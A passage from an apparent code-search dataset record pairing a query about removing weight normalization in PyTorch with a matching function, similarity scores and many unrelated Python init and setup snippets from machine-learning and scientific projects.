tf.reduce_mean(tf.square(1-self.dis_fake_A)))*0.5 +\\\n (tf.reduce_mean(tf.square(self.dis_real_Ah)) +\\\n tf.reduce_mean(tf.square(1-self.dis_fake_Ah)))*0.5*self.lambda_h\n \n \n self.loss_dis_B = (tf.reduce_mean(tf.square(self.dis_real_B)) +\\\n tf.reduce_mean(tf.square(1-self.dis_fake_B)))*0.5 +\\\n (tf.reduce_mean(tf.square(self.dis_real_Bh)) +\\\n tf.reduce_mean(tf.square(1-self.dis_fake_Bh)))*0.5*self.lambda_h\n \n self.loss_gen_A = tf.reduce_mean(tf.square(self.dis_fake_A)) +\\\n self.lambda_h * tf.reduce_mean(tf.square(self.dis_fake_Ah)) +\\\n self.lambda_c * self.loss_cyc/2.\n self.loss_gen_B = tf.reduce_mean(tf.square(self.dis_fake_B)) +\\\n self.lambda_h * tf.reduce_mean(tf.square(self.dis_fake_Bh)) +\\\n self.lambda_c * self.loss_cyc/2.\n \n # Create the different optimizer\n with self.graph.as_default():\n # Optimizer for Gen\n self.list_gen = []\n for var in tf.trainable_variables():\n if 'gen' in str(var):\n self.list_gen.append(var)\n optimizer_gen = tf.train.AdamOptimizer(learning_rate=self.relative_lr*0.0002,beta1=0.5)\n self.opt_gen = optimizer_gen.minimize(self.loss_gen_A+self.loss_gen_B,var_list=self.list_gen)\n \n # Optimizer for Dis\n self.list_dis = []\n for var in tf.trainable_variables():\n if 'dis' in str(var):\n self.list_dis.append(var)\n optimizer_dis = tf.train.AdamOptimizer(learning_rate=self.relative_lr*0.0002,beta1=0.5)\n self.opt_dis = optimizer_dis.minimize(self.loss_dis_A + self.loss_dis_B,var_list=self.list_dis)", "def init():\n\n # Complete our stop words set.\n add_extra_words()\n\n model = read_model(MODEL_FILE)\n model_keys = list(model.keys())\n\n # Basic random.\n new_comment = generate_comment(model=model, order=2,\n number_of_sentences=2,\n initial_prefix=random.choice(model_keys))\n\n # Selective random.\n new_comment = generate_comment(model=model, order=2,\n number_of_sentences=2,\n initial_prefix=get_prefix(model_keys))\n\n # Context-aware.\n new_comment = generate_comment(model=model, order=2,\n number_of_sentences=2,\n initial_prefix=get_prefix_with_context(model, \"Agent_Phantom\"))\n\n print(new_comment)", "def generator_setup():\n PaaSPureGenerator()", "def __init__(self):\n\n self.parser = self.define_parser()\n self.pen = Pen()", "def Init(ss):\n rand.Seed(ss.RndSeed)\n ss.UpdateEnv()\n ss.StopNow = False\n ss.SetParams(\"\", False)\n ss.NewRun()\n ss.UpdateView(True)", "def __init__(self, dim, rn, gammak, sine=False, feature_generator=None):\n\n\t\tself.dim = dim\n\t\tself.rn = rn\n\t\tself.gammak = gammak\n\n\t\tif feature_generator is None:\n\t\t\tself.feature_generator = GaussianRandomFeatures(self.dim, self.rn, self.gammak, sine=sine)\n\t\telse: self.feature_generator = feature_generator", "def __init__(self, sid, split, library, style, **pargs):\n\n if 'print' not in pargs:\n pargs['print'] = (10**4, 'time', 'dt', 'atoms')\n\n self.rank = split.Get_rank()\n self.split = split\n self.pargs = pargs\n self.monitorList = []\n self.vars = {}\n self.path = os.getcwd()\n self.nSS = len(self.pargs['species'])\n self.output = self.pargs['output']\n self._dir, _ = __file__.split(__name__.split('PyGran.simulation.')[-1] + '.py')\n self._monitor = [] # a list of tuples of (varname, filename) to monitor\n\n if '__version__' in pargs:\n self.__version__ = self.pargs['__version__']\n\n if not self.rank:\n global logging\n\n logging = import_module(name='logging')\n\n logging.basicConfig(filename='pygran.log', format='%(asctime)s:%(levelname)s: %(message)s', level=logging.DEBUG)\n\n logging.info(\"Working in {}\".format(self.path))\n logging.info('Creating i/o directories')\n\n if not os.path.exists(self.pargs['traj']['dir']):\n os.makedirs(self.pargs['traj']['dir'])\n\n if self.pargs['restart']:\n if not os.path.exists(self.pargs['restart'][1]):\n os.makedirs(self.pargs['restart'][1])\n\n logging.info('Instantiating LIGGGHTS object')\n\n self.lmp = liggghts(comm=self.split, library=library.strip(), cmdargs=['-log', 'liggghts.log'])\n\n if not self.rank:\n logging.info('Setting up problem dimensions and boundaries')\n\n self.lmp.command('units {}'.format(self.pargs['units']))\n\n if hasattr(self, '__version__'): \n if self.__version__ >= 3.6:\n self.lmp.command('hard_particles yes')\n else:\n # Get version from version_liggghts.txt. TODO: find a faster way to do this.\n try:\n version_txt = find('version_liggghts.txt', '/')\n self.__liggghts__ = version_txt.split('version_liggghts.txt')[0]\n\n with open(version_txt, 'r+') as fp:\n major, minor, _ = fp.readline().rstrip().split('.')\n self.__version__ = float(major + '.' + minor)\n except:\n if not self.rank:\n print('Could not find LIGGGHTS version. Proceeding ... ')\n self.__version__ = 'unknown'\n self.__liggghts__ = 'n/a'\n\n # Write version + src dir to config file if it exists\n if not self.rank:\n if os.path.isfile(self._dir + '../.config'):\n with open(self._dir + '../.config', 'a+') as fp:\n fp.write('\\nversion={}'.format(self.__version__))\n fp.write('\\nsrc={}'.format(self.__liggghts__))\n if self.__version__ >= 3.6:\n self.lmp.command('hard_particles yes')\n\n self.lmp.command('dimension {}'.format(self.pargs['dim']))\n self.lmp.command('atom_style {}'.format(style))\n self.lmp.command('atom_modify map array') # array is faster than hash in looking up atomic IDs, but the former takes more memory\n self.lmp.command('boundary ' + ('{} ' * len(pargs['boundary'])).format(*pargs['boundary']))\n self.lmp.command('newton off') # turn off newton's 3rd law ~ should lead to better scalability\n self.lmp.command('communicate single vel yes') # have no idea what this does, but it's imp for ghost atoms\n self.lmp.command('processors * * *') # let LIGGGHTS handle DD", "def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.__iteration_number = kwargs['iteration_number']\n self.__particles = [\n PSOParticle(**kwargs, bit_generator=self._random)\n for _ in range(kwargs['particles'])\n ]\n\n # The library stores particles in the visualizer .... groan\n positions = [particle.position for particle in self.__particles]\n self._visualizer = NoVisualizer(**kwargs)\n self._visualizer.add_data(positions=positions)", "def create_generators(cfg, backbone):\n if cfg.anchor_params:\n if 'small' in cfg.anchor_params:\n anchor_params = AnchorParameters.small\n else:\n anchor_params = None\n else:\n anchor_params = None\n\n common_args = {\n 'batch_size': cfg.batchsize,\n 'config': None,\n 'image_min_side': cfg.image_size[0],\n 'image_max_side': cfg.image_size[1],\n 'filter_annotations_enabled': False,\n 'preprocess_image': backbone.preprocess_image,\n 'normalize_radar': cfg.normalize_radar,\n 'camera_dropout': cfg.dropout_image,\n 'radar_dropout': cfg.dropout_radar,\n 'channels': cfg.channels,\n 'distance': cfg.distance_detection,\n 'sample_selection': cfg.sample_selection,\n 'only_radar_annotated': cfg.only_radar_annotated,\n 'n_sweeps': cfg.n_sweeps,\n 'noise_filter': cfg.noise_filter_cfg,\n 'noise_filter_threshold': cfg.noise_filter_threshold,\n 'noisy_image_method': cfg.noisy_image_method,\n 'noise_factor': cfg.noise_factor,\n 'perfect_noise_filter': cfg.noise_filter_perfect,\n 'radar_projection_height': cfg.radar_projection_height,\n 'noise_category_selection': None if cfg.class_weights is None else cfg.class_weights.keys(),\n 'inference': cfg.inference,\n 'anchor_params': anchor_params,\n }\n\n # create random transform generator for augmenting training data\n if cfg.random_transform:\n transform_generator = random_transform_generator(\n min_rotation=-0.1,\n max_rotation=0.1,\n min_translation=(-0.1, -0.1),\n max_translation=(0.1, 0.1),\n min_shear=-0.1,\n max_shear=0.1,\n min_scaling=(0.9, 0.9),\n max_scaling=(1.1, 1.1),\n flip_x_chance=0.5,\n flip_y_chance=0.0,\n )\n else:\n transform_generator = random_transform_generator(flip_x_chance=0.5)\n\n category_mapping = cfg.category_mapping\n\n if 'nuscenes' in cfg.data_set:\n # import here to prevent unnecessary dependency on nuscenes\n from crfnet.data_processing.generator.nuscenes_generator import NuscenesGenerator\n from nuscenes.nuscenes import NuScenes\n\n if 'mini' in cfg.data_set:\n nusc = NuScenes(version='v1.0-mini', dataroot=cfg.data_path, verbose=True)\n else:\n try:\n nusc = NuScenes(version='v1.0-trainval', dataroot=cfg.data_path, verbose=True)\n except ValueError:\n nusc = NuScenes(version='v1.0-mini', dataroot=cfg.data_path, verbose=True)\n\n\n if 'debug' in cfg.scene_selection or 'mini' in cfg.data_set:\n scenes = Scenes.debug\n else:\n scenes = Scenes.default\n\n train_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.train,\n transform_generator=transform_generator,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n shuffle_groups=True,\n group_method='random',\n **common_args\n )\n\n # no dropouts in validation\n common_args['camera_dropout'] = 0\n common_args['radar_dropout'] = 0\n\n validation_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.val,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n **common_args\n )\n\n test_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.test,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n **common_args\n )\n\n test_night_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.test_night,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n **common_args\n )\n\n test_rain_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.test_rain,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n **common_args\n )\n return train_generator, validation_generator, test_generator, test_night_generator, test_rain_generator\n else:\n raise ValueError('Invalid data type received: {}'.format(cfg.data_set))", "def init(self, rng_key, num_warmup, init_params, model_args, model_kwargs):\n raise NotImplementedError", "def init():\n global neural_network\n global labels\n\n # load objects required by run() for inferencing\n model_dir = Model.get_model_path(\"mnist-fashion\")\n # neural model\n neural_network = keras.models.load_model(f\"{model_dir}/neural-network.h5\")\n # labels\n with open(f\"{model_dir}/labels.jsonpickle\", \"r\") as labels_file:\n labels = jsonpickle.decode(labels_file.read())", "def __init__(self,args,graph):\n self.args = args\n self.graph = graph\n self.targets = overlap_generator(self.args.target_weighting, self.graph)\n self.weights = overlap_generator(self.args.regularization_weighting, self.graph)\n self.nodes = self.graph.nodes()\n self.vocab_size = len(self.nodes)\n self.true_step_size = ((len(self.weights.keys()) / 2) * args.batch_size * self.args.epochs)\n self.edges = nx.edges(self.graph)\n self.build()", "def do_init(self):\n\n pass", "def __init_accessors (self):\n self.colors = ay.utils.Colors\n self.layout = Layout(self.seed)\n self.shapes = Shapes", "def __init__(self):\n # Passing the class make this Python 2 and Python 3 compatible\n super(MayaSceneLevelGeneratorUI, self).__init__(parent=maya_main_window())\n\n # Create the generators needed\n self._level_gen = level.LevelGenerator([blocks.BlockFile(\"\", blk_type) for blk_type in VALID_BLOCK_TYPES])\n self._scene_gen = MayaSceneLevelGenerator(None) # Fill in level at button press time\n\n # Window things\n self.setWindowTitle(\"Maya Scene Level Generator\")\n self.resize(500, 200)\n self.setWindowFlags(self.windowFlags() ^ PySide2.QtCore.Qt.WindowContextHelpButtonHint)\n\n # Set up for the first time\n self._create_widgets()\n self._create_layout()\n self._refresh_view()\n self._create_connections() # Order matters, since refreshing triggers connections\n\n print(self._level_gen.block_list) # TODO delete", "def create_initial_graph(self):\n # Initialise weights\n for link in self.gene_links:\n link.weight = random.uniform(weight_init_min, weight_init_max)\n # Initialise biases\n for node in self.gene_nodes:\n node.bias = random.uniform(bias_init_min, bias_init_max)\n if node.can_modify:\n node.act_func = self.act_set.get_random_activation_func()\n if node.act_func in [activations.gaussian, activations.sin]:\n if node.act_func.__name__[0] == \"g\":\n node.freq += random.uniform(-guass_freq_adjust, guass_freq_adjust)\n elif node.act_func.__name__[0] == \"s\":\n node.freq += random.uniform(-sin_freq_adjust, sin_freq_adjust)\n node.amp += random.uniform(-func_amp_adjust, func_amp_adjust)\n node.vshift += random.uniform(-func_vshift_adjust, func_vshift_adjust)", "def init():\r\n\t# add grabber tools based on proxy tools\r\n\tfor proxyWrapper in vizconnect.getToolsWithMode('Proxy'):\r\n\t\tgrabberTool = tools.grabber.HandGrabber(usingPhysics=False,\r\n\t\t\t\t\t\t\t\t\t\t\t\tusingSprings=False,\r\n\t\t\t\t\t\t\t\t\t\t\t\tplacementMode=tools.placer.MODE_DROP_DOWN)\r\n\t\t\r\n\t\tname = 'grabber_tool_based_on_'+proxyWrapper.getName()\r\n\t\tgrabberWrapper = vizconnect.addTool(raw=grabberTool,\r\n\t\t\t\t\t\t\t\t\t\t\tname=name,\r\n\t\t\t\t\t\t\t\t\t\t\tmake='Virtual',\r\n\t\t\t\t\t\t\t\t\t\t\tmodel='Grabber')\r\n\t\t# parent the grabber wrapper to the proxy's parent\r\n\t\tgrabberWrapper.setParent(proxyWrapper)\r\n\t\t\r\n\t\tgrabberTool.setItems(grabbableItems)\r\n\t\r\n\tviz.callback(viz.getEventID('RESET_THE_LOFT_LAYOUT'), lambda e: resetMovedObjects())", "def setup(self):\n\n self.parser = GingerIt()", "def setup_class(self):\n\n from scipy.spatial import cKDTree\n\n shape = (500, 500)\n\n # define random star positions\n nstars = 50\n from astropy.utils.misc import NumpyRNGContext\n with NumpyRNGContext(12345): # seed for repeatability\n xx = np.random.uniform(low=0, high=shape[1], size=nstars)\n yy = np.random.uniform(low=0, high=shape[0], size=nstars)\n\n # enforce a minimum separation\n min_dist = 25\n coords = [(yy[0], xx[0])]\n for xxi, yyi in zip(xx, yy):\n newcoord = [yyi, xxi]\n dist, distidx = cKDTree([newcoord]).query(coords, 1)\n if np.min(dist) > min_dist:\n coords.append(newcoord)\n yy, xx = np.transpose(coords)\n\n with NumpyRNGContext(12345): # seed for repeatability\n zz = np.random.uniform(low=0, high=200000., size=len(xx))\n\n # define a table of model parameters\n self.stddev = 2.\n sources = Table()\n sources['amplitude'] = zz\n sources['x_mean'] = xx\n sources['y_mean'] = yy\n sources['x_stddev'] = np.zeros(len(xx)) + self.stddev\n sources['y_stddev'] = sources['x_stddev']\n sources['theta'] = 0.\n\n self.data = make_gaussian_sources_image(shape, sources)\n self.nddata = NDData(self.data)\n\n init_stars = Table()\n init_stars['x'] = xx.astype(int)\n init_stars['y'] = yy.astype(int)\n self.init_stars = init_stars", "def init():\n global balls, super_balls\n\n balls = [gen_ball() for _ in range(number_of_balls)]\n super_balls = []\n generate_velocity_all_balls()", "def initialize_ai(self):\n\n self.gid, self.genome = constants.genomes_to_run[self.identifier]\n self.genome.fitness = -1\n self.net = neat.nn.FeedForwardNetwork.create(self.genome, constants.conf)\n # self.net = neat.nn.RecurrentNetwork\n # .create(self.genome, constants.conf)", "def setup_class(self):\n args = {'pdb_path':'/sdf/home/a/apeck/tomoxtal/examples/input/193l.pdb', 'resolution':6.0, 'size':250}\n\n # generate structure factors and retrieve associated cell information\n sf = cctbx_tools.reference_sf(args['pdb_path'], args['resolution'], expand_to_p1=True)\n sf_data = cctbx_tools.reformat_sf(sf)\n sg_symbol, sg_no, self.cell, cs = cctbx_tools.unit_cell_info(args['pdb_path'])\n \n # add random phase shifts\n hklIp1, hklIp2, hklIp3 = sf_data.copy(), sf_data.copy(), sf_data.copy()\n hklIp2[:,-1], self.shifts2 = phases_utils.add_random_phase_shift(sf_data[:,:3], sf_data[:,-1])\n hklIp3[:,-1], self.shifts3 = phases_utils.add_random_phase_shift(sf_data[:,:3], sf_data[:,-1])\n\n # retain subset of Millers\n for data in [hklIp1,hklIp2,hklIp3]:\n keep_idx = np.unique(np.random.randint(0, high=data.shape[0], size=args['size']))\n data = data[keep_idx]\n \n self.data1, self.data2, self.data3 = hklIp1, hklIp2, hklIp3\n fshifts_list = np.random.uniform(size=(4,3))\n self.fshifts_list = np.vstack((fshifts_list, 1-self.shifts2, 1-self.shifts3))", "def setup(self):\n for gen in self._generators:\n gen.setup()", "def _init_anim(self):\n pass", "def __init__(self, *args, **kwargs):\n _gdi_.Palette_swiginit(self,_gdi_.new_Palette(*args, **kwargs))", "def __init__(self):\n self.model = {'mol':[], 'nmol':0}\n self.template = {} \n self.config = {}\n self.config['tfile'] = 'gau-template-bsse.gjf'\n self.config['xyzfile'] = 'model.xyz'\n self.config['jobfile'] = 'gau.gjf'\n self.config['job_prefix'] = self.config['jobfile'].split(\".\")[0]\n self.config['incr'] = 1\n \n self.rd_cmd_stream()\n return", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def __init__(self, opt: argparse.Namespace) -> None:\n super().__init__(opt)\n\n self.gpu_ids = opt.gpu_ids\n self.is_train = opt.is_train\n self.output_nch = opt.output_nch\n self.device = torch.device('cuda:{}'.format(self.gpu_ids[0])) if self.gpu_ids else torch.device('cpu')\n\n # generator module\n self._generator_module = generator_modules[opt.generator_module_name](opt)\n apply_init_weight(self._generator_module, opt, init_weight=init_weights[opt.init_weight_name])\n if self.is_train:\n # discriminator module\n self._discriminator_module = discriminator_modules[opt.discriminator_module_name](opt)\n apply_init_weight(self._discriminator_module, opt, init_weight=init_weights[opt.init_weight_name])\n # generator optimizer\n self._generator_optimizer = optimizers[opt.generator_optimizer_name](self._generator_module.parameters(), opt)\n # discriminator optimizer\n self._discriminator_optimizer = optimizers[opt.discriminator_optimizer_name](self._discriminator_module.parameters(), opt)\n # generator scheduler\n self._generator_scheduler = schedulers[opt.generator_scheduler_name](self._generator_optimizer, opt)\n # discriminator scheduler\n self._discriminator_scheduler = schedulers[opt.discriminator_scheduler_name](self._discriminator_optimizer, opt)\n\n # register\n if not self.is_train:\n self.modules['generator'] = self._generator_module\n else:\n self.modules['generator'] = self._generator_module\n self.modules['discriminator'] = self._discriminator_module\n self.optimizers['generator'] = self._generator_optimizer\n self.optimizers['discriminator'] = self._discriminator_optimizer\n self.schedulers['generator'] = self._generator_scheduler\n self.schedulers['discriminator'] = self._discriminator_scheduler\n\n self.module_transfer_to_device()", "def initialize_trainer(self):\n self.initialize_matrices()\n self.initialize_model()\n self.initialize_optimizers()\n return self", "def __init__(self, model, n_pix=1, strategy='rand1bin', max_iter=100, popsize=400,\n init='normal', target=None, args=None, **kwargs):\n self.model = model\n self.n_pix = n_pix\n self.strategy = strategy\n self.max_iter = max_iter\n self.popsize = popsize\n self.init = init\n self.target = target\n self.args = args\n self.kwargs = kwargs\n\n self.step_meter = AverageMeter()", "def setUp(self) -> None:\n self.random = np.random.RandomState(seed=42)", "def init(self) -> None:\n ...", "def __init__(self, skin_directory):\n self.ax = None\n self.generate_axis()\n self.skin_directory = skin_directory\n self.figure = plt.gcf()", "def initialise_rng(self):\n\n\t\tself.rng = numpy.random.RandomState()", "def __init__(self, init_pos, init_stdev, num_particles, sense_noise):\n self.particles = np.random.multivariate_normal(\n init_pos, [[init_stdev**2, 0], [0, init_stdev**2]], num_particles)\n self.weights = np.array(\n [1. / num_particles for _ in range(num_particles)])\n self.n = num_particles\n self.sense_noise = sense_noise", "def initialize(self):\n self.gc1.reset_parameters()\n self.gc2.reset_parameters()\n\n for s in self.scores:\n stdv = 1. / math.sqrt(s.size(1))\n s.data.uniform_(-stdv, stdv)\n for b in self.bias:\n # fill in b with postive value to make\n # score s closer to 1 at the beginning\n b.data.fill_(self.bias_init)\n\n for Dk in self.D_k:\n stdv = 1. / math.sqrt(Dk.size(1))\n Dk.data.uniform_(-stdv, stdv)\n\n for b in self.D_bias:\n b.data.fill_(0)", "def setup(self):\n self.star_list = arcade.SpriteList()\n\n for i in range(50):\n # Create snowflake instance\n singlestar = Singlestar()\n # Add snowflake to snowflake list\n self.star_list.append(singlestar)\n\n # Don't show the mouse pointer\n self.set_mouse_visible(False)\n\n # Set the background color\n arcade.set_background_color(arcade.color.BLACK)", "def __init__(self, **kwargs):\n super(VeryCleverBeamsplitter, self).__init__(**kwargs)\n self.shader_source = IL_SHADER_SOURCE\n self.centre = [0.5, 0.5]\n self.blazing_function = np.linspace(0,1,32)\n self.zernike_coefficients = np.zeros(12)", "def __init__(self):\n self.last_reward_pos = 0\n super().__init__()\n self.TERRAIN_VARIANCE = 0.0\n self.stump_spacing = 4.0\n self.stump_height = 1.0\n self.my_init({'leg_length': 35, 'walker_type': 'default'})", "def gff_init():\n pass", "def generate_gazettes(self):\n # TODO: generate_gazettes\n pass", "def __init__(self):\n\t\t# Setup fonts\n\t\tself.large_font = self._get_font(1,Annotator.THICK)\n\t\tself.large_font_outline = self._get_font(1,Annotator.THICK + Annotator.BORDER)\n\t\t\n\t\tself.small_font = self._get_font(0.5,Annotator.THIN)\n\t\tself.small_font_outline = self._get_font(0.5,Annotator.THIN + Annotator.BORDER)\n\t\t\n\t\t# Text colour\n\t\tself.colour = Annotator.COLOUR_BUSY\n\t\t\n\t\tself.forehead = (0,0,1,1)\n\t\tself.face = (0,0,1,1)", "def __init__(self, styles, nature):\n #: Dictionary of key-value pairs, where *keys* are the style names.\n self.styles = styles\n\n #: Cell *nature* used to distinguish the body cells, from the header and the footer.\n self.nature = nature", "def init_model(model):\n model(tf.random.uniform((1, 512, 512, 3)))", "def __init__(self, *args):\n _hypre.HypreBoomerAMG_swiginit(self, _hypre.new_HypreBoomerAMG(*args))", "def init(self):\n sys_init_lines = CodeWriter.write_init()\n self.init_lines.extend(sys_init_lines)", "def feed_parser_initialization(generator):\n\n generator.plugin_instance = GitHubActivity(generator)", "def init(init_state) -> GelmanRubinState:\n n_chains, n_dims = init_state.position.shape\n w_state = w_init(n_chains, n_dims)\n return GelmanRubinState(w_state, 0, jnp.nan)", "def initialize( self, layout, numGhostAgents=1000 ):\n self.data.initialize(layout, numGhostAgents) ##self.data is defined in the Grid() class of game.py REF112.It creates an initial game state from a layout array (see layout.py).", "def __init__(self, generator:Model,\n discriminator:Model,\n latent_dim:Optional[Union[int, Tuple]]=None,\n n_disc:int=3,\n epochs:int=100, \n batch_size:int=32,\n optimizer:Optional[Union[str, Dict]]=None,\n optimizer_kwargs:Optional[Dict]=None,\n name:str='QGAN',\n random_state:Optional[int]=None,\n checkpoint_dir:Optional[str]=None,\n checkpoint_interval:int=10,\n checkpoint_max_to_keep:Optional[int]=None):\n super().__init__(generator=generator,\n discriminator=discriminator,\n latent_dim=latent_dim,\n n_disc=n_disc,\n epochs=epochs,\n batch_size=batch_size,\n optimizer=optimizer,\n optimizer_kwargs=optimizer_kwargs,\n name=name,\n random_state=random_state,\n checkpoint_dir=checkpoint_dir,\n checkpoint_interval=checkpoint_interval,\n checkpoint_max_to_keep=checkpoint_max_to_keep)", "def __init__(\n self, config: SimpleGCNConfig = SimpleGCNConfig(name=\"simplegcn\")\n ):\n super().__init__()\n self.edge_lengthscale = config.edge_lengthscale\n self.weight_edges = config.weight_edges\n\n self.atom_embedding = nn.Linear(\n config.atom_input_features, config.width\n )\n\n self.layer1 = GraphConv(config.width, config.width)\n self.layer2 = GraphConv(config.width, config.output_features)\n self.readout = AvgPooling()", "def generate(self):\n self.generate_points()\n self.generate_edges()", "def __init__( self, config: 'bittensor.config' = None ):\n if config == None: config = neuron.config()\n self.config = config; neuron.check_config( self.config ); print ( self.config )\n bittensor.logging (\n config = self.config,\n logging_dir = self.config.neuron.full_path,\n )\n self.device = torch.device(\n device = self.config.neuron.device\n )\n self.wallet = bittensor.wallet(\n config = self.config\n )\n self.dendrite = bittensor.dendrite(\n config = self.config,\n wallet = self.wallet\n )\n self.subtensor = bittensor.subtensor(\n config = self.config\n )\n self.metagraph = bittensor.metagraph(\n config = self.config\n )\n self.axon = bittensor.axon (\n config = self.config,\n wallet = self.wallet,\n forward_callback = self.forward,\n backward_callback = self.backward\n )\n self.dataset = bittensor.dataloader (\n config = self.config\n )\n self.router = SGMOERouter(\n config = self.config\n ).to( self.device )\n self.nucleus = GPT2Nucleus(\n config = self.config,\n routing_callback = self.route\n ).to( self.device )\n self.optimizer = torch.optim.SGD(\n [\n {\"params\": self.router.parameters()},\n {\"params\": self.nucleus.parameters()}\n ],\n lr = self.config.neuron.learning_rate,\n weight_decay = self.config.neuron.weight_decay,\n )\n self.tensorboard = SummaryWriter(\n log_dir = self.config.neuron.tensorboard_dir\n )\n self.mechanism_weights = torch.ones( [0] )\n self.epoch = 0\n self.global_step = 0\n self.epoch_loss = math.inf/2\n self.best_epoch_loss = math.inf", "def init_data_generator(config_tuple, data_dir):\n\n (_preprocess_function, flags) = config_tuple\n rescale = 1. / 255 if _preprocess_function is None else None\n image_sizes = (flags.image_width, flags.image_height)\n batch_size = flags.batch_size\n # Configure test generator\n train_datagen = ImageDataGenerator(\n preprocessing_function=_preprocess_function,\n rescale=rescale,\n rotation_range=30,\n width_shift_range=0.2,\n height_shift_range=0.2,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True\n )\n # Configure test data flow\n train_generator = train_datagen.flow_from_directory(\n data_dir,\n target_size=image_sizes,\n batch_size=batch_size,\n )\n\n return train_generator", "def __init__(self):\n self.monsters_images = pg.sprite.Group()\n self.font_23 = pg.font.Font(prepare.FONTS['Timeless-Bold'], 23)\n self.font_20 = pg.font.Font(prepare.FONTS['Timeless'], 20)\n self.font_18 = pg.font.Font(prepare.FONTS['Timeless'], 18)\n self.bold_font = pg.font.Font(prepare.FONTS['Timeless-Bold'], 17)\n self.font_15 = pg.font.Font(prepare.FONTS['Timeless'], 15)\n\n self.init_left_zone()\n self.init_middle_zone()\n self.init_right_zone()", "def initialise(self):", "def setUp(self):\n self.G = nx.DiGraph()", "def init(self):", "def init(self):", "def get_generator(upscale_factor, init_gain):\n net = Generator(upscale_factor)\n init_weights(net, 'normal', init_gain)\n return net", "def __init__(self, n, sick_init, social_dist, radius=0.01, styles=None, total_beds=10, box_length=1, recovery_time=1000):\n\n self.init_persons(n, sick_init, social_dist, radius, box_length, recovery_time, total_beds, styles)\n self.init_hospital(total_beds)", "def __init__(self, init_grid=None):\n\n self.height = len(init_grid)\n self.width = len(init_grid[0])\n\n self.grid = [[Cell(self, c) for c in row]\n for row in init_grid]\n\n self.g = nx.Graph()\n self.tangle()", "def run_init(self):\n InitEditor(self.root, self)", "def __init__(self, nn_architecture, seed=99):\n self.nn_architecture = nn_architecture\n self.seed = seed" ]
[ "0.70491105", "0.64428604", "0.637395", "0.6040094", "0.5974412", "0.5972569", "0.59458107", "0.5878243", "0.5834997", "0.58195186", "0.5818394", "0.57847136", "0.5784305", "0.57710445", "0.5760498", "0.57129806", "0.57045466", "0.5686031", "0.56733465", "0.56541693", "0.5648489", "0.56451994", "0.56442606", "0.56295323", "0.5628919", "0.5617335", "0.56137913", "0.5608328", "0.5608047", "0.56037456", "0.5597709", "0.55815846", "0.55487365", "0.5530901", "0.55302197", "0.5528794", "0.55172604", "0.5492429", "0.5491154", "0.5480714", "0.54802424", "0.5479133", "0.5460474", "0.5458128", "0.5455443", "0.5454315", "0.5451266", "0.54501486", "0.5450099", "0.54436934", "0.5438619", "0.54269975", "0.5420654", "0.5420033", "0.5418447", "0.5407051", "0.5406016", "0.5406016", "0.5406016", "0.5406016", "0.5406016", "0.5406016", "0.5406016", "0.5406016", "0.53843033", "0.5381603", "0.538061", "0.5380021", "0.5371804", "0.53713214", "0.5365139", "0.5352667", "0.5341051", "0.53409266", "0.5334971", "0.532768", "0.5325246", "0.532338", "0.53229016", "0.53167784", "0.5313635", "0.5309547", "0.5300738", "0.52929324", "0.5292666", "0.52908814", "0.5286943", "0.528638", "0.5286195", "0.5282467", "0.52786773", "0.52687025", "0.5266926", "0.5259751", "0.5256807", "0.5256807", "0.525625", "0.52561986", "0.52506745", "0.5247278", "0.52437615" ]
0.0
-1
Remove weight normalization module from all of the layers.
def remove_weight_norm(self): def _remove_weight_norm(m): try: logging.debug(f"Weight norm is removed from {m}.") torch.nn.utils.remove_weight_norm(m) except ValueError: # this module didn't have weight norm return self.apply(_remove_weight_norm)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def remove_norms(module_: \"WN\") -> \"WN\":\n module_.start = torch.nn.utils.remove_weight_norm(module_.start_conv)\n module_.cond_layer = torch.nn.utils.remove_weight_norm(module_.cond_layer)\n for i, layer_ in enumerate(module_.in_layers):\n layer_ = DepthwiseSeparableConv1d.remove_batch_norm(layer_)\n module_.in_layers[i] = layer_\n for i, layer_ in enumerate(module_.res_skip_layers):\n layer_ = torch.nn.utils.remove_weight_norm(layer_)\n module_.res_skip_layers[i] = layer_\n return module_", "def remove_weight_norm_(self):\n\n def _remove_weight_norm(m):\n try:\n torch.nn.utils.remove_weight_norm(m)\n except ValueError:\n return\n\n self.apply(_remove_weight_norm)", "def remove_norms(self):\n dev = next(self.parameters()).device\n for name, module in self.named_modules():\n try:\n nn.utils.remove_spectral_norm(module, name='weight_hh_l0')\n print(\"Removed spectral norm from {}\".format(name))\n except:\n pass\n try:\n nn.utils.remove_spectral_norm(module, name='weight_hh_l0_reverse')\n print(\"Removed spectral norm from {}\".format(name))\n except:\n pass\n try:\n nn.utils.remove_weight_norm(module)\n print(\"Removed wnorm from {}\".format(name))\n except:\n pass\n self.to(device=dev)", "def remove_norms(model: \"SqueezeWave\") -> \"SqueezeWave\":\n squeeze_wave = model\n for i, wn_layer in enumerate(squeeze_wave.wn_layers):\n squeeze_wave.wn_layers[i] = WN.remove_norms(wn_layer)\n return squeeze_wave", "def remove_activation_hooks(self):\n for h in self.hooks:\n h.remove()\n h = None\n for l in self.list_mods:\n if ('norm' in self.list_mods):\n (b, l) = l\n # Skip non-prunable layers\n if (hasattr(l, 'prune_values')):\n l.prune_values = None\n self.hooks = None", "def reset_weights(self):\n self.policy_backbone.reset_weights()\n self.value_backbone.reset_weights()\n self.action_head.reset_weights()\n self.critic_head.reset_weights()", "def remove_batchnorm(m: nn.Sequential) -> None:\n ms = list(m._modules.items())\n\n # transfer biases from BN to previous conv / Linear / Whatever\n for (name1, mod1), (name2, mod2) in 